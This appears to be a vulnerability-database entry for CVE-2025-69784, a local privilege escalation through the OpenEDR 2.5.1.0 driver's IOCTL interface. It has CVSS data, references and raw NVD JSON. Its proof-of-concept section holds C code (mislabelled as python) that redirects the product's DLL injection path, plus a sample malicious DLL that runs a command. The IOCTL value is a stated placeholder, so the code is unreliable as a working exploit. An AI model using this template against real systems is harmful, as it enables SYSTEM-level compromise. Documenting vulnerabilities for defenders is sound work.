CVE-2025-69784

Description

A local, non-privileged attacker can abuse a vulnerable IOCTL interface exposed by the OpenEDR 2.5.1.0 kernel driver to modify the DLL injection path used by the product. By redirecting this path to a user-writable location, an attacker can cause OpenEDR to load an attacker-controlled DLL into high-privilege processes. This results in arbitrary code execution with SYSTEM privileges, leading to full compromise of the affected system.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:xcitium:openedr:2.5.1.0:*:*:*:*:*:*:* - VULNERABLE

OpenEDR < 2.5.1.0

OpenEDR 2.5.1.0 (affected)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-69784 PoC - OpenEDR DLL Injection via IOCTL
// This PoC demonstrates modifying DLL injection path via vulnerable IOCTL

#include <windows.h>
#include <stdio.h>
#include <winioctl.h>

// Define the IOCTL code (example - actual value may vary)
#define IOCTL_MODIFY_DLL_PATH 0xDEADBEEF

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    char maliciousPath[] = "C:\\Users\\Public\\malicious.dll";
    
    // Open handle to OpenEDR driver
    hDevice = CreateFile(
        "\\\\.\\\\OpenedrDevice",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device. Error: %d\n", GetLastError());
        return 1;
    }
    
    printf("[+] Opened handle to OpenEDR driver\n");
    
    // Modify DLL injection path to user-writable location
    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_MODIFY_DLL_PATH,
        maliciousPath,
        strlen(maliciousPath) + 1,
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    
    if (result) {
        printf("[+] DLL path modified to: %s\n", maliciousPath);
        printf("[+] Next DLL load will execute code with SYSTEM privileges\n");
    } else {
        printf("[-] Failed to modify DLL path. Error: %d\n", GetLastError());
    }
    
    CloseHandle(hDevice);
    return 0;
}

// Example malicious DLL payload (malicious.c)
/*
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Execute SYSTEM-level code here
        system("cmd.exe /c whoami > C:\\Users\\Public\\pwned.txt");
    }
    return TRUE;
}
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69784
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69784
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69784/
[4] VulDB https://vuldb.com/cve/CVE-2025-69784
[5] https://gist.github.com/ikerl/c3ec81f12ded44c2e0ae2dfdacb562ba
[6] https://github.com/ComodoSecurity/openedr
[7] https://github.com/ComodoSecurity/openedr/issues/49
[8] https://scavengersecurity.com/posts/edr-as-rootkit-2/
[9] https://www.openedr.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69784", "sourceIdentifier": "[email protected]", "published": "2026-03-16T16:16:13.460", "lastModified": "2026-03-20T13:51:52.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local, non-privileged attacker can abuse a vulnerable IOCTL interface exposed by the OpenEDR 2.5.1.0 kernel driver to modify the DLL injection path used by the product. By redirecting this path to a user-writable location, an attacker can cause OpenEDR to load an attacker-controlled DLL into high-privilege processes. This results in arbitrary code execution with SYSTEM privileges, leading to full compromise of the affected system."}, {"lang": "es", "value": "Un atacante local y no privilegiado puede abusar de una interfaz IOCTL vulnerable expuesta por el controlador del kernel OpenEDR 2.5.1.0 para modificar la ruta de inyección de DLL utilizada por el producto. Al redirigir esta ruta a una ubicación escribible por el usuario, un atacante puede hacer que OpenEDR cargue una DLL controlada por el atacante en procesos de alto privilegio. Esto resulta en ejecución de código arbitrario con privilegios de SYSTEM, lo que lleva a un compromiso total del sistema afectado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xcitium:openedr:2.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C2BE1711-EE54-4E5D-A6CD-40033932443C"}]}]}], "references": [{"url": "https://gist.github.com/ikerl/c3ec81f12ded44c2e0ae2dfdacb562ba", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/ComodoSecurity/openedr", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ComodoSecurity/openedr/issues/49", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://scavengersecurity.com/posts/edr-as-rootkit-2/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.openedr.com/", "source": "[email protected]", "tags": ["Product"]}]}}